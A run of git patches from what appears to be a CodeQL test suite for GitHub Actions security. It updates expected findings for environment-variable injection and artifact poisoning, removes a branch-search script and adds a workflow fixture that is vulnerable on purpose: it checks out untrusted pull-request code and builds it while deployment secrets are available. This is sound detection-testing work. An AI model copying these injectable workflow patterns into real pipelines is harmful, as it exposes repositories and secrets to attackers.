PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 1ac092dd0d3..23bc7784f76 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -1,4 +1,9 @@ edges +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | @@ -25,6 +30,16 @@ edges | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | nodes +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning91.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning92.yml:20:14:24:55 | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | semmle.label | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt \| tail -n 1)"\npr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)"\necho PR_COMMIT="$pr_commit" >> "$GITHUB_ENV"\necho PR_NUMBER="$pr_number" >> "$GITHUB_ENV"\n | | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | | .github/workflows/test3.yml:13:7:20:4 | Uses Step | semmle.label | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 7aa170a2e98..7a59ab6ec60 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -11,9 +11,6 @@ edges | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | nodes @@ -38,12 +35,6 @@ nodes | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | @@ -62,9 +53,6 @@ subpaths | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | npm install\nnpm run lint\n | | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | ./cmd | -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | python test.py | | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 8d946507799..2ed89bcb4bc 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -11,9 +11,6 @@ edges | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | Config | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | Config | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | Config | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | Config | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | nodes @@ -38,12 +35,6 @@ nodes | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | From 7fa77e2728eead10408dbfa5d076e8f4b25ce8cc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 12:05:00 +0200 Subject: [PATCH 0583/1267] Delete test script --- search_branches.py | 88 ---------------------------------------------- 1 file changed, 88 deletions(-) delete mode 100644 search_branches.py diff --git a/search_branches.py b/search_branches.py deleted file mode 100644 index d0036169fea..00000000000 --- a/search_branches.py +++ /dev/null @@ -1,88 +0,0 @@ -import base64 -import os -import re -import sys -import time - -import requests - - -def handle_rate_limit(response, wait_time=60): - return False - - -def search_branches(repo_nwo, file_path, regex_pattern): - # GitHub API base URL - base_url = "https://api.github.com" - - # Get GitHub token from environment variable - github_token = os.environ.get("GITHUB_TOKEN") - if not github_token: - print("Error: GITHUB_TOKEN environment variable not set") - sys.exit(1) - - # Set up headers for authenticated requests - headers = { - "Authorization": f"token {github_token}", - "Accept": "application/vnd.github.v3+json", - } - - # Get all branches (with pagination) - branches_url = f"{base_url}/repos/{repo_nwo}/branches" - branches = [] - while branches_url: - branches_response = requests.get(branches_url, headers=headers) - if handle_rate_limit(branches_response): - continue - branches_response.raise_for_status() - branches.extend(branches_response.json()) - branches_url = branches_response.links.get("next", {}).get("url") - - # Compile the regex pattern - pattern = re.compile(regex_pattern) - - # Search file contents in each branch - for branch in branches: - branch_name = branch["name"] - file_url = f"{base_url}/repos/{repo_nwo}/contents/{file_path}?ref={branch_name}" - - while True: - file_response = requests.get(file_url, headers=headers) - - if file_response.status_code == 200: - file_content = file_response.json()["content"] - - decoded_content = base64.b64decode(file_content).decode("utf-8") - - if pattern.search(decoded_content): - print(f"Match found in branch: {branch_name}!!!!!") - else: - print(f"No match found in branch: {branch_name}") - break - elif file_response.status_code == 404: - print(f"File not found in branch: {branch_name}") - break - elif ( - file_response.status_code == 403 - and "X-RateLimit-Remaining" in file_response.headers - ): - if int(file_response.headers["X-RateLimit-Remaining"]) == 0: - reset_time = int(file_response.headers["X-RateLimit-Reset"]) - sleep_time = reset_time - int(time.time()) + 1 - print(f"Rate limit exceeded. Waiting for {sleep_time} seconds.") - time.sleep(sleep_time) - - -if __name__ == "__main__": - if len(sys.argv) != 4: - print("Usage: python search_branches.py ") - sys.exit(1) - - repo_nwo = sys.argv[1] - file_path = sys.argv[2] - regex_pattern = sys.argv[3] - - print( - f"Searching branches in {repo_nwo} for {file_path} with pattern {regex_pattern}" - ) - search_branches(repo_nwo, file_path, regex_pattern) From 3b95ae0b531c9555bb2318b8f54b556edcce132b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 12:15:58 +0200 Subject: [PATCH 0584/1267] Bump QLPacks versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 229b1f81c7b..82891e5c017 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.66 +version: 0.1.67 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e03e2a45cb7..fb4416ffb1d 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.66 +version: 0.1.67 groups: [actions, queries] suites: codeql-suites extractor: javascript From ff17d1dcb1d243238644816e59faae13edd84290 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 12:50:11 +0200 Subject: [PATCH 0585/1267] Add CmdI test --- ql/src/Debug/partial.ql | 4 +- .../CWE-094/.github/workflows/test16.yml | 231 ++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 27 ++ .../CWE-094/CodeInjectionMedium.expected | 23 ++ 4 files changed, 284 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index cb8ba7873d8..c1578220b6b 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -18,7 +18,9 @@ import PartialFlow::PartialPathGraph private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - source.getLocation().getFile().getBaseName() = "non-existant-test.yml" + //source.getLocation().getFile().getBaseName() = "non-existant-test.yml" + source.getLocation().getFile().getBaseName() = "test16.yml" and + source.getLocation().getStartLine() = 125 } predicate isSink(DataFlow::Node sink) { none() } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml new file mode 100644 index 00000000000..0b3002506a1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test16.yml @@ -0,0 +1,231 @@ +name: 📤 Preview Deploy + +on: + workflow_run: + workflows: + - 🎬 Setup + types: + - completed + +permissions: + contents: read + pull-requests: write + +jobs: + setup: + if: ${{ github.event.workflow_run.conclusion == 'success' }} + runs-on: ubuntu-latest + + outputs: + id: ${{ steps.pr.outputs.value }} + ref: ${{ steps.ref.outputs.value }} + repo: ${{ steps.repo.outputs.value }} + + steps: + # Get PR id from artifact + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + run_id: ${{ github.event.workflow_run.id }} + name: pr-id + + - name: get PR id + id: pr + run: echo "value=$(> $GITHUB_OUTPUT + + # Get PR ref from artifact + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + run_id: ${{ github.event.workflow_run.id }} + name: pr-ref + + - name: get PR ref + id: ref + run: echo "value=$(> $GITHUB_OUTPUT + + # Get PR repo from artifact + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + run_id: ${{ github.event.workflow_run.id }} + name: pr-repo + + - name: get PR repo + id: repo + run: echo "value=$(> $GITHUB_OUTPUT + + prepare: + runs-on: ubuntu-latest + needs: [setup] + + steps: + # ================= Create Comment ================= + - name: 🧽 Find And Delete Comment + uses: peter-evans/find-comment@v2 + if: ${{ needs.setup.outputs.id != '' }} + id: fc + with: + issue-number: ${{ needs.setup.outputs.id }} + comment-author: 'github-actions[bot]' + body-includes: View Deployment + + - name: 📠Create or update comment + uses: peter-evans/create-or-update-comment@v3 + if: ${{ needs.setup.outputs.id != '' }} + with: + comment-id: ${{ steps.fc.outputs.comment-id }} + issue-number: ${{ needs.setup.outputs.id }} + body: | + ## View Deployment + + [#${{ github.run_id }}](https://github.com/dream-num/univer/actions/runs/${{ github.run_id }}) + +

+ 🥠🔠🥓 🥗 🥘 🌯 🚠🛠🖠🭠🧠ðŸ 🥪 🥖 ðŸª
+ Still cooking, please come back later
+ 🥙 🥮 🥨 🌭 🦠🙠🕠🰠🮠🜠🡠🱠🿠🕠🥟 +

+ edit-mode: replace + + build-demo: + runs-on: ubuntu-latest + needs: [setup] + + outputs: + preview-url: ${{ steps.vercel-demo-dev.outputs.preview-url == '' && steps.vercel-demo.outputs.preview-url || steps.vercel-demo-dev.outputs.preview-url }} + commit-message: ${{ steps.commit-message.outputs.value }} + + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + repository: ${{ needs.setup.outputs.repo }} + ref: ${{ needs.setup.outputs.ref }} + + - name: Setup pnpm + uses: pnpm/action-setup@v4 + with: + run_install: false + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: 20 + cache: pnpm + + - name: Install dependencies + run: pnpm install + + - name: Get commit message + id: commit-message + run: echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT + + # ================= Deploy Demo ================= + - name: 📦 Build demo + run: pnpm build:demo + + - name: Copy demo to workspace + run: | + mkdir .workspace + cp -r ./examples/local/* .workspace + + - name: 🚀 Deploy to Vercel (demo) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref == '' }} + id: vercel-demo + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID}} + vercel-args: --prod + + - name: 🚀 Deploy to Vercel (demo) + uses: amondnet/vercel-action@v25 + if: ${{ needs.setup.outputs.ref != '' }} + id: vercel-demo-dev + with: + vercel-token: ${{ secrets.VERCEL_TOKEN }} + vercel-org-id: ${{ secrets.ORG_ID }} + vercel-project-id: ${{ secrets.PROJECT_ID}} + + build-storybook: + runs-on: ubuntu-latest + needs: [setup] + + outputs: + preview-url: ${{ steps.vercel-storybook-dev.outputs.preview-url == '' && steps.vercel-storybook.outputs.preview-url || steps.vercel-storybook-dev.outputs.preview-url }} + + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + repository: ${{ needs.setup.outputs.repo }} + ref: ${{ needs.setup.outputs.ref }} + + - name: Setup 